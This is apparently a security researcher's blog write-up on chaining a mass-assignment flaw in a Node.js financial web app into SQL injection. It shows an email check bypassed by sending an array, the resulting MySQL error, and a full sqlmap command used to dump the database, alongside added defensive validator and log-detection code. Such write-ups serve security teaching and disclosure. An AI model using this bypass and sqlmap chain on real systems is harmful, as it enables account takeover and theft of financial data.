Unveiling the Consequences: Database Dump Exploitation through Mass Assignment Vulnerability


Introduction

Mass assignment vulnerability, also known as over-posting vulnerability, is a security flaw that can occur in web applications that utilize frameworks or libraries that automatically bind user-submitted data to corresponding model properties or database columns. This vulnerability allows attackers to manipulate and modify sensitive data by submitting unexpected or unauthorized values for those properties.

The vulnerability arises when developers don’t properly validate or sanitize user input before assigning it to model properties. In certain frameworks, this behavior is convenient as it simplifies the process of mapping user input to model objects. However, it becomes a security concern when sensitive fields, such as authentication credentials, access controls, or administrative privileges, can be manipulated by malicious users.

Here’s an example to illustrate the issue:

Consider a web application that allows users to update their profile information, such as name, email, and password. The application uses a framework that automatically binds the form data to the corresponding fields in the user model.

class User < ActiveRecord::Base
  attr_accessible :name, :email # Vulnerable code
  ...
end

In the above code, the developer has used the attr_accessible method to specify that the name and email fields are accessible and can be assigned from user input.

However, an attacker can manipulate the request payload by adding additional form fields that were not intended to be modified by the user, such as:

<form action="/profile" method="POST">
<input type="text" name="name" value="John Doe">
<input type="text" name="email" value="johndoe@example.com">
<input type="hidden" name="admin" value="true"> <!-- Unintended field -->
<input type="submit" value="Update">
</form>

In this example, the attacker has added a hidden input field named “admin” with the value set to “true.” When the form is submitted, the framework blindly assigns the value “true” to the “admin” field in the user model, even though it was not intended to be modifiable by the user. This can grant the attacker administrative privileges or other unauthorized access.

Target Background

The web application is built on Node.js with the Express framework. It uses dynamic roles: new roles can be created and assigned to users as business requirements change. The application is used mainly for financial purposes.

Technology Stack

The technology stack used in the Target application includes the following components:

  • Bootstrap
  • Express
  • Node.js

CRUD Operation

CRUD refers to Create, Read, Update, and Delete operations, which are fundamental to managing data in both database systems and web applications. Each letter in the acronym represents a specific operation.

Exploiting Mass Assignment Vulnerability

The Target application provides a feature that allows users to update their profiles with various details. However, changing the email address is restricted since users sign up using their email addresses.

Request

POST /editUser HTTP/2
Host: abc.com
Cookie: blah....blah...
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Csrf-Token: csrf_token_value
Referer: https://abc.com/dashboard
Content-Length: 534
Origin: https://abc.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

{
  "user_Id": "2abaac0a-4af8-4101-a763-9d0229cafb12",
  "email": "naveenj@thevillagehacker.com",
  "Mobile": "9874563217",
  "role": "Analyst",
  "isActive": true
}

The request shows that the endpoint accepts an email field in the update payload, even though the user interface disables editing the email.

Response

HTTP/1.1 200 OK 
Access-Control-Allow-Origin: * 
Content-Type: application/json; charset=utf-8 
Set-Cookie: blah...blah...blah...; Path=/; HttpOnly 
X-Frame-Options: SAMEORIGIN 
X-Content-Type-Options: nosniff 
X-XSS-Protection: 1; mode=block 
Referrer-Policy: strict-origin-when-cross-origin 
Connection: close 
Strict-Transport-Security: max-age=31536000; includeSubDomains

{
  "Success": true,
  "Message": "User details Updated"
}

The server responds with a 200 OK status code and a success message indicating that the user’s details have been successfully updated.

Bypassing the Security Measures

Changing the existing email value in the request results in an “Invalid Request Data” error response, so the server does check the email field. That check can be bypassed by passing the email as an array instead of a string.

{
  "user_Id": "2abaac0a-4af8-4101-a763-9d0229cafb12",
  "email": [
    "naveenj@thevillagehacker.com",
    "attacker@thevillagehacker.com"
  ],
  "Mobile": "9874563217",
  "role": "Analyst",
  "isActive": true
}

After sending the above request, the server responds with a “200 OK” status code and a success message, indicating that the user details have been updated.
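The two problems on this page, the extra fields bound by mass assignment in the earlier form example (the hidden “admin” input) and the array-typed email that slips past the email check here, are both stopped by a strict schema on the request body. The following is an added example written for this post, not the target application's code: the policy (only Mobile and email may be submitted, each as a plain string, with the email required to equal the session user's) and the loose check it contrasts with are assumptions.

```javascript
// Added example (not the target application's code). A strict schema for the
// /editUser body that stops both issues on this page: extra fields bound by
// mass assignment (the hidden "admin" input) and the array-typed "email" that
// slips past a loose "unchanged" check. Field names follow the page's request.

// Hypothetical policy: the user may submit these fields, each as a plain
// string; user_Id, role and isActive come from the session, never the body.
const EDITABLE_FIELDS = { Mobile: "string", email: "string" };

// Hypothetical reconstruction of a check that only works for strings:
// Array.prototype.includes makes ["current", "attacker"] pass as "unchanged".
function naiveEmailUnchanged(submitted, currentEmail) {
  return submitted.includes(currentEmail);
}

function validateEditUser(body, currentUser) {
  const errors = [];
  const clean = {};
  if (body === null || typeof body !== "object" || Array.isArray(body)) {
    return { ok: false, errors: ["body must be a JSON object"], clean };
  }
  for (const [key, value] of Object.entries(body)) {
    // hasOwnProperty, not `in`: `"toString" in EDITABLE_FIELDS` is true.
    if (!Object.prototype.hasOwnProperty.call(EDITABLE_FIELDS, key)) {
      errors.push(`unexpected field: ${key}`); // worth logging: mass-assignment probe
      continue;
    }
    // typeof [] is "object", so an array never satisfies a "string" rule.
    if (typeof value !== EDITABLE_FIELDS[key]) {
      errors.push(`field ${key} must be ${EDITABLE_FIELDS[key]}`);
      continue;
    }
    // Strict string comparison: the email may be echoed back, never changed.
    if (key === "email" && value !== currentUser.email) {
      errors.push("email is not editable");
      continue;
    }
    clean[key] = value;
  }
  return { ok: errors.length === 0, errors, clean };
}

// Constructed sample: the page's own user and the two payload shapes.
const me = { email: "naveenj@thevillagehacker.com" };
console.log(validateEditUser({ Mobile: "9874563217", email: me.email }, me));
console.log(validateEditUser({ Mobile: "9874563217",
  email: [me.email, "attacker@thevillagehacker.com"] }, me));
```

The validator rejects the array with a type error before any comparison runs, while the naive `includes` check accepts it.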

GET /user_detail

To retrieve the current user’s details, a GET request to /user_detail is made.

Request

GET /user_detail HTTP/2
Host: abc.com
Cookie: blah....blah...
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Csrf-Token: csrf_token_value
Referer: https://abc.com/dashboard
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

Response

HTTP/1.1 200 OK 
Access-Control-Allow-Origin: * 
Content-Type: application/json; charset=utf-8 
Set-Cookie: blah...blah...blah...; Path=/; HttpOnly 
X-Frame-Options: SAMEORIGIN 
X-Content-Type-Options: nosniff 
X-XSS-Protection: 1; mode=block 
Referrer-Policy: strict-origin-when-cross-origin 
Connection: close 
Strict-Transport-Security: max-age=31536000; includeSubDomains

{
  "user_Id": "2abaac0a-4af8-4101-a763-9d0229cafb12",
  "email": "attacker@thevillagehacker.com",
  "Mobile": "9874563217",
  "role": "Analyst",
  "isActive": true
}

The response contains the user’s details, including the updated email address.

SQL Injection

Earlier attempts to find SQL injection in the application were unsuccessful. The array-typed email value, however, is a new input path worth exploring further.

When special characters or a space are placed in the array, the server responds with a SQL syntax error.

Request

POST /editUser HTTP/2
Host: abc.com
Cookie: blah....blah...
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Csrf-Token: csrf_token_value
Referer: https://abc.com/dashboard
Content-Length: 534
Origin: https://abc.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

{
  "user_Id": "2abaac0a-4af8-4101-a763-9d0229cafb12",
  "email": [
    "naveenj@thevillagehacker.com",
    " "
  ],
  "Mobile": "9874563217",
  "role": "Analyst",
  "isActive": true
}

Response

HTTP/1.1 200 OK 
Access-Control-Allow-Origin: * 
Content-Type: application/json; charset=utf-8 
Set-Cookie: blah...blah...blah...; Path=/; HttpOnly 
X-Frame-Options: SAMEORIGIN 
X-Content-Type-Options: nosniff 
X-XSS-Protection: 1; mode=block 
Referrer-Policy: strict-origin-when-cross-origin 
Connection: close 
Strict-Transport-Security: max-age=31536000; includeSubDomains

{
  "code": 400,
  "message": "ER_PARSE_ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ' '*'' at line 1"
}

The server responds with an error message that reveals a MySQL syntax error, which shows both that the backend is MySQL and that the array element reaches the query. Further exploitation can be automated using SQLMAP.
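From the defending side, this exchange leaves two clear signals in application logs: a scalar field of /editUser arriving as a JSON array, and a raw ER_PARSE_ERROR message being returned to a client. The following detection pass is an added example, not the target application's code; the JSON-per-line log format, timestamps and log lines are constructed for illustration.

```javascript
// Added example (not the target application's code). A small detection pass
// over constructed JSON-per-line application logs (hypothetical format) that
// flags the two signals this page produces: a scalar field of /editUser
// arriving as an array, and a MySQL ER_PARSE_ERROR message reaching a client.
const SAMPLE_LOG = [
  { ts: "2023-08-01T10:00:00Z", path: "/editUser", status: 200,
    body: { email: "naveenj@thevillagehacker.com", Mobile: "9874563217" },
    message: "User details Updated" },
  { ts: "2023-08-01T10:01:00Z", path: "/editUser", status: 200,
    body: { email: ["naveenj@thevillagehacker.com", "attacker@thevillagehacker.com"],
      Mobile: "9874563217" },
    message: "User details Updated" },
  { ts: "2023-08-01T10:02:00Z", path: "/editUser", status: 400,
    body: { email: ["naveenj@thevillagehacker.com", " "], Mobile: "9874563217" },
    message: "ER_PARSE_ERROR: You have an error in your SQL syntax; ..." },
  { ts: "2023-08-01T10:03:00Z", path: "/user_detail", status: 200, body: null },
].map((r) => JSON.stringify(r)).join("\n");

// Fields the /editUser handler expects as scalars (from the page's request).
const SCALAR_FIELDS = ["user_Id", "email", "Mobile", "role", "isActive"];

function analyzeLog(text) {
  const findings = [];
  for (const line of text.split("\n")) {
    if (!line.trim()) continue;
    let rec;
    try { rec = JSON.parse(line); } catch { continue; } // skip malformed lines
    const reasons = [];
    const body = rec.body && typeof rec.body === "object" ? rec.body : {};
    const arrayFields = SCALAR_FIELDS.filter((f) => Array.isArray(body[f]));
    if (arrayFields.length > 0) {
      reasons.push("array-in-scalar-field:" + arrayFields.join(","));
    }
    if (typeof rec.message === "string" && rec.message.includes("ER_PARSE_ERROR")) {
      reasons.push("sql-parse-error-returned-to-client");
    }
    if (reasons.length > 0) {
      // Both signals on one request is the injection-probe pattern: escalate.
      findings.push({ ts: rec.ts, path: rec.path, status: rec.status,
        severity: reasons.length > 1 ? "high" : "medium", reasons });
    }
  }
  return findings;
}

console.log(analyzeLog(SAMPLE_LOG));
```

Note that the second sample line is a 200 response: the type anomaly alone is the earlier signal, before any database error appears.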

SQLMAP Automation

python .\sqlmap\sqlmap.py -r "request.txt" --batch --dbs --risk 3 --level 4 --random-agent --tamper=between --proxy=http://127.0.0.1:8080

Dumping Database

[Image omitted: screenshot of the database dump output]

Thanks for reading!

For more insights and updates, follow me on Twitter: @thevillagehacker.

Naveen J

Security Researcher | Appsec Specialist@SISA Information Security | Web 3 Security Enthusiast